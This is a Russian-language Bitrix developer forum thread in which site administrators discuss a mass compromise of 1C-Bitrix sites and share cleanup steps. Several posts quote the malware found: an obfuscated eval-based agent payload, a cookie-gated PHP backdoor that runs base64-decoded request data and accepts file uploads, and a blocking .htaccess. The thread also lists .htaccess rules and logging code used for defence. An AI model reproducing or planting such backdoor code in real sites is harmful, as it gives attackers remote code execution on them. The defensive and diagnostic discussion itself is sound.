Разработчикам

Форум

Взломаны сайты в честь дня конституции украины

Пользователь 2663075

Постоянный посетитель

Сообщений: 132 Баллов: 24 Регистрация: 20.11.2018

#391

28.02.2023 14:06:24

Цитата

написал:
Мы у себя также обнаружили файл в процессах с вредоносным кодом

Код
bitrix+ 10296 0.0 0.0 201500 21048 ? S 03 : 30 0 : 05 php / var /www/bitrix/src/app/l.php

А так также Агент с вредоносным кодом

Код

 $arAgent["NAME"];//_(9.)H'5t}>qo7ouj7 < ( > !)U}3/]6u8u}Q%' //>w7u5ST < "IA.xY:8eeval       /* 9 ! ._IkZ ) 1   DcpyxJA \" F / C1ra / 9 + E /&^ 15 > Z"yd3y)vk$p6FN*/(/*]~P@.iKSyR3+hRfkLK~GUv3ZgJ!6dmtClEc{/*/urldecode#Dcc5L6|8cI8+~/?Y(/*I$s6IW3YhccLGyx^v2BAJN@ZnzRYVa+*/strrev/*8/WKh@/MlVGf6?yY`E)" w}SRU5]V{]n+5:tVJCC"j+8+%rlK{n*/(/* GC5%z1bi=x%3OOVsQB~jM%]:PZ*|Ox|v < 3|8D`"bY(u* /' b3 % 56 % 57 % 27 % 47 % 02 % e6 % 27 % 57 % 47 % 56 % 27 % 02 % 02 % 02 % 02 % 02 % 02 % 02 % 02 % a0 % d7 % 02 % 02 % 02 % 02 % a0 % b3 % 92 % 27 % 42 % 82 % c6 % 16 % 67 % 56 % 02 % 02 % 02 % 02 % a0 % 56 % 37 % c6 % 56 % 02 % 02 % 02 % 02 % a0 % d7 % 02 % 02 % 02 % 02 % a0 % b3 % 27 % 42 % 02 % d3 % 02 % 47 % c6 % 57 % 37 % 56 % 27 % f5 % c6 % 16 % 67 % 56 % 42 % 02 % 02 % 02 % 02 % a0 % b3 % 92 % 22 % 13 % 02 % d3 % 02 % 44 % 94 % 02 % 54 % 25 % 54 % 84 % 75 % 02 % 72 % e4 % 72 % 02 % d3 % 02 % 44 % f4 % 94 % 25 % 54 % 05 % f5 % 35 % 94 % 02 % c2 % 03 % 63 % 02 % d3 % 02 % c4 % 14 % 65 % 25 % 54 % 45 % e4 % 94 % f5 % 45 % e4 % 54 % 74 % 14 % 02 % 45 % 54 % 35 % 02 % 47 % e6 % 56 % 76 % 16 % f5 % 26 % 02 % 54 % 45 % 14 % 44 % 05 % 55 % 22 % 82 % 97 % 27 % 56 % 57 % 15 % e3 % d2 % 24 % 44 % 42 % 02 % 02 % 02 % 02 % a0 % b7 % 92 % 92 % d5 % 22 % 87 % 87 % 87 % 56 % 27 % f6 % 47 % 37 % 56 % 27 % 22 % b5 % 45 % 35 % 54 % 55 % 15 % 54 % 25 % f5 % 42 % 82 % 47 % 56 % 37 % 37 % 96 % 82 % 66 % 96 % 02 % 02 % 02 % 02 % a0 % b3 % 72 % b3 % 92 % 82 % 16 % 47 % 16 % 44 % 47 % 96 % d6 % 26 % 57 % 37 % a3 % a3 % 56 % c6 % 26 % 16 % 45 % 16 % 47 % 16 % 44 % 27 % 56 % 47 % e6 % 57 % f6 % 34 % c5 % c5 % 37 % 36 % 96 % 47 % 97 % c6 % 16 % e6 % 14 % c5 % c5 % e6 % 96 % 16 % d4 % c5 % c5 % 87 % 96 % 27 % 47 % 96 % 24 % c5 % c5 % 72 % 02 % d3 % 02 % 27 % 42 % 02 % 02 % 02 % 02 % a0 % b7 % 56 % 37 % c6 % 56 % 02 % 02 % 02 % 02 % a0 % d7 % 02 % 02 % 02 % 02 % a0 % d7 % 02 % 02 % 02 % 02 % a0 % b3 % 47 % 96 % 87 % 56 % 02 % 02 % 02 % 02 % a0 % b7 % 92 % 56 % 42 % 02 % e6 % f6 % 96 % 47 % 07 % 56 % 36 % 87 % 54 % 82 % 02 % 86 % 36 % 47 % 16 % 36 % 02 % 02 % 02 % 02 % a0 % d7 % 02 % 02 % 02 % 02 % a0 % b3 % 92 % 92 % 92 % d5 % 22 % 87 % 87 % 87 % 96 % 27 % 47 % 96 % 26 % 22 % b5 % 45 % 35 % 54 % 55 % 15 % 54 % 25 % f5 % 42 % 82 % 56 % 46 % f6 % 36 % 56 % 46 % c6 % 27 % 57 % 82 % 56 % 46 % f6 % 36 % 56 % 46 % c6 % 27 % 57 % 82 % c6 % 16 % 67 % 56 % 02 % d3 % 02 % 56 % 42 % 02 % 02 % 02 % 02 % a0 % b7 % 97 % 27 % 47 % 02 % 02 % 02 % 02 % a0 % a0 % b3 % 92 % 22 % 13 % 02 % d3 % 02 % 44 % 94 % 02 % 54 % 25 % 54 % 84 % 75 % 02 % 72 % e4 % 72 % 02 % d3 % 02 % 74 % e4 % 94 % e4 % e4 % 55 % 25 % 02 % c2 % 03 % 02 % d3 % 02 % 45 % e4 % 55 % f4 % 34 % f5 % 95 % 25 % 45 % 54 % 25 % 02 % c2 % c4 % c4 % 55 % e4 % 02 % d3 % 02 % b4 % 34 % 54 % 84 % 34 % f5 % 54 % 45 % 14 % 44 % 02 % 45 % 54 % 35 % 02 % 47 % e6 % 56 % 76 % 16 % f5 % 26 % 02 % 54 % 45 % 14 % 44 % 05 % 55 % 22 % 82 % 97 % 27 % 56 % 57 % 15 % e3 % d2 % 24 % 44 % 42 % 02 % 02 % 02 % 02 % a0 % b7 % 92 % 92 % d5 % 22 % 87 % 87 % 87 % 96 % 27 % 47 % 96 % 26 % 22 % b5 % 45 % 35 % 54 % 55 % 15 % 54 % 25 % f5 % 42 % 82 % 47 % 56 % 37 % 37 % 96 % 82 % 66 % 96 % 02 % 02 % 02 % 02 % a0 % 02 % 02 % 02 % 02 % 02 % 02 % 02 % 02 % a0 %'/*}+ o | u > #TYS0cP_\NWyaT2'55io>_yv*/)       #T/N82kY'xApsEIx`?}`2_DB3;dm)    /*pqPWM{~IE(WOT)l=?x[>zBI# yCBI#B:usrCorl6zEeOOSmoMJ.*/)/*LlRo0|sR8iF+.7}{MxB4Iqg8a5bp^OJ+=|z*/;/*"3YH?h_>d.8'Cay+z\A]M!.x,Lu({qx}&SFE < 'c!6|)Y^* /

Помогли следующие шаги:
1. Восстановить сайт из незараженной копии
2. Удалить vote модуль, мы ним не пользуемся
3. Убить вредоносный процесс (/var/www/bitrix/src/app/l.php)
4. Восстановить агент, который был заражен. Там изначально был просто код CEvent::CleanUpAgent();
5. Удалить файлы php, которые были созданы в корневой папке сайта и в /bitrix/admin (/bitrix/admin/f408f2b7df70.php, /f408f2b7df70.php)

Пока файл перестал создаваться, хотя запросы продолжаются.
Будем наблюдать.

Смотрите еще в /bitrix/admin/ файлы больше 100-200 байт с непонятными и странными именами.
Так же могут быть вложены папки с такими же названиями как более верхний уровень.

Про вирус | Модуль защиты

Пользователь 44943

Постоянный посетитель

Сообщений: 138 Баллов: 22 Регистрация: 03.07.2009

#392

01.03.2023 01:31:59

Цитата
написал: когда .htaccess похерели на сайте клиента, я несколько тысяч инфицированных .htaccess поиском нашел пришлось с бэкапа восстановиться

да он почти в каждой папке появился.

Пользователь 44943 Постоянный посетитель Сообщений: 138 Баллов: 22 Регистрация: 03.07.2009	#393 1 01.03.2023 01:35:51 Обновили битрикс. Но файл в bitrix/admin сегодня опять создался.

Пользователь 547017

Заглянувший

Сообщений: 12 Баллов: 1 Регистрация: 04.04.2016

#394

01.03.2023 02:35:28

Цитата
Евгений Власов написал: Обновили битрикс. Но файл в bitrix/admin сегодня опять создался.

Возможно в базе есть шелл либо где-то внутри есть еще исполняемые файлы вируса, желательно отсканировать антивирусом и все отсмотреть...

Пользователь 13618

Эксперт

Сообщений: 1363 Баллов: 122 Регистрация: 05.04.2011

Сертифицированный партнер

#395

01.03.2023 03:32:21

Цитата
Евгений Власов написал: Обновили битрикс. Но файл в bitrix/admin сегодня опять создался.

Смотрите логи, чистите бэкдоры.
В агентах обязательно проверьте.

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 2663075

Постоянный посетитель

Сообщений: 132 Баллов: 24 Регистрация: 20.11.2018

#396

01.03.2023 11:50:07

Цитата

написал:
Всем привет!

Сегодня обнаружили такую же проблему, с внедрением вредоносного кода и остановкой работоспособности сайта.
Вирус наплодил файлы .htaccess с содержимым:

Код
< FilesMatch ' . ( py \| exe \| phtml \| php \| PHP \| Php \| PHp \| pHp \| pHP \| pHP7 \| PHP7 \| phP \| PhP \| php5 \| suspected )$'> Order allow,deny Deny from all </ FilesMatch >

а также файлы вида "2469a41bac71.php" с содержимым:

Код

   <? = 409723 * 20 ; if (md5( $_COOKIE [d])== "17028f487cb2a84607646da3ad3878ec" ){ echo  "ok" ; eval (base64_decode( $_REQUEST [id])); if ( $_POST [ "up" ]== "up" ){@copy( $_FILES [ "file" ][ "tmp_name" ], $_FILES [ "file" ][ "name" ]);}} ?>

Судя по логам, атака началась еще 4 дня назад...
Внедрение пришло с не обновлённых модулей и компонентов, которые теперь придется обновлять всем, т.к. проблемка с вирусами массового характера...

Тем, у кого нет бекапов - сочувствую, т.к. вычищать придется очень много всего (только .htaccess у нас больше 1000, т.к. расплодились по всем разделам включая папку /upload/)

У нас хостинг Бегет, поэтому проблем с бекапами нет, спасибо бегету за это...

В общем, решение следующее:
0. Остановить работу сайта и сделать его недоступным (за нас это сделал хостер) - иначе файлы пересоздаются
1. Восстановить все файлы сайта из бекапа / вычищать все лишние файлы и папки, а также права (755 - папки, 644 - файлы)
2. Восстановить базу данных из бекапа - по возможности
3. Разрешить доступ к сайту со своего ip-адреса (1.2.3.4) в nginx либо в .htaccess:
до Apache 2.4:

Код
Deny from All Allow from 1.2.3.4

c Apache 2.4:

Код
Require all denied Require ip 1.2 .3 .4

4. Если не хочется или не можется выполнить п.3 - удаляем или переименовываем разделы модулей и файлы *.php:
- /bitrix/modules/vote/
- /bitrix/modules/ui/
- /bitrix/tools/vote/
- /bitrix/modules/fileman/
- /bitrix/modules/main/tools/uf.php
- /bitrix/modules/main/tools/upload.php
- /bitrix/modules/main/tools/composite_data.php

5. Вернуть работу сайта
6. Произвести обновление системы (перед обновлением можно восстановить удаленные/переименованные файлы, если был п.4)
7. Перейти на PHP 8.1 / 8.2 и радоваться еще какое-то время неуязвимости системы

А далее проверяем access и error логи - для отслеживания и блокировки атакуемых файлов или модулей.

24 февраля начали - годовщина СВО.
То что модули ui/fileman рекомендуете удалить - это неправильно - основополагающие модули. можно тогда /bitrix/modules/main удалить тоже, чтоб надежно вирус загасить. но это и сайт не будет работать

))

Про вирус | Модуль защиты

Пользователь 3544308

Заглянувший

Сообщений: 1 Регистрация: 01.03.2023

#397

01.03.2023 12:32:09

коллеги, у кого после лечения и всяческих блокировок гадость продолжает лезть - проверьте агенты. у себя обнаружил в списке агентов эвал-код, который запускался и порождал бекдор.

сильно помогла статья https://ydmitry.ru/blog/massovyy-vzlom-saytov-na-1s-bitriks-kak-zashchititsya/

Пользователь 547017

Заглянувший

Сообщений: 12 Баллов: 1 Регистрация: 04.04.2016

#398

01.03.2023 13:24:50

Цитата
Алексей написал: То что модули ui/fileman рекомендуете удалить - это неправильно - основополагающие модули. можно тогда /bitrix/modules/main удалить тоже, чтоб надежно вирус загасить. но это и сайт не будет работать ))

Проверено на себе - если переименовать временно модули из списка, работоспособность сайта извне не теряется, но редактировать/или добавлять контент не получится, конечно.

После чистки и перед самим обновлением их нужно будет вернуть. К сожалению, для избавления от дыр обновиться нужно будет обязательно.
Для меня это пока наиболее быстрый вариант очистки от вируса...

PS: по идее, тем у кого редакция выше 18, достаточно избавиться только от vote, но это не точно...

Пользователь 427967

Заглянувший

Сообщений: 2 Регистрация: 03.02.2016

#399

01.03.2023 15:20:56

Тоже столкнулись с созданием странных файлов в bitrix/admin, создаются они путём POST запросов на главную страницу сайта. Защитились запретом на отправку POST запросов к главной странице директивой в .htaccess.

RewriteCond %{REQUEST_METHOD} POST
RewriteCond %{REQUEST_URI} ^/$
RewriteRule .* - [F,L]

Теперь злоумышленник получает 403 в ответ на пост запрос, и файлы не создаются.

Пользователь 13618

Эксперт

Сообщений: 1363 Баллов: 122 Регистрация: 05.04.2011

Сертифицированный партнер

#400

01.03.2023 16:06:01

dmitry920, Вы бы лучше на этой главной содержимое $_POST запроса куда нить в файлик сохранили и сюда запостили, тогда можно найти адресата - скорее всего в ядре где-то спрятался.
В Вашем случае злоумышленнику достаточно этот $_POST запрос на любую другую страницу направить и вуаля.
в самое начало index.php разместите (блокировку уберите, она тут есть)

Код
@mkdir('logs'); if(!empty($_POST)) { file_put_contents('./logs/post-'.time().'.log', var_export($_POST, true)); die('hack attempt'); }

перед die() можно ещё добавить mail('mail@to', 'hack attempt', 'hack attempt'); чтобы попытки POST запросов на мыло фиксировать, после чего в ./logs/ заглянуть и сюда содержимое файлика закинуть

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Форум

Центр поддержки

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером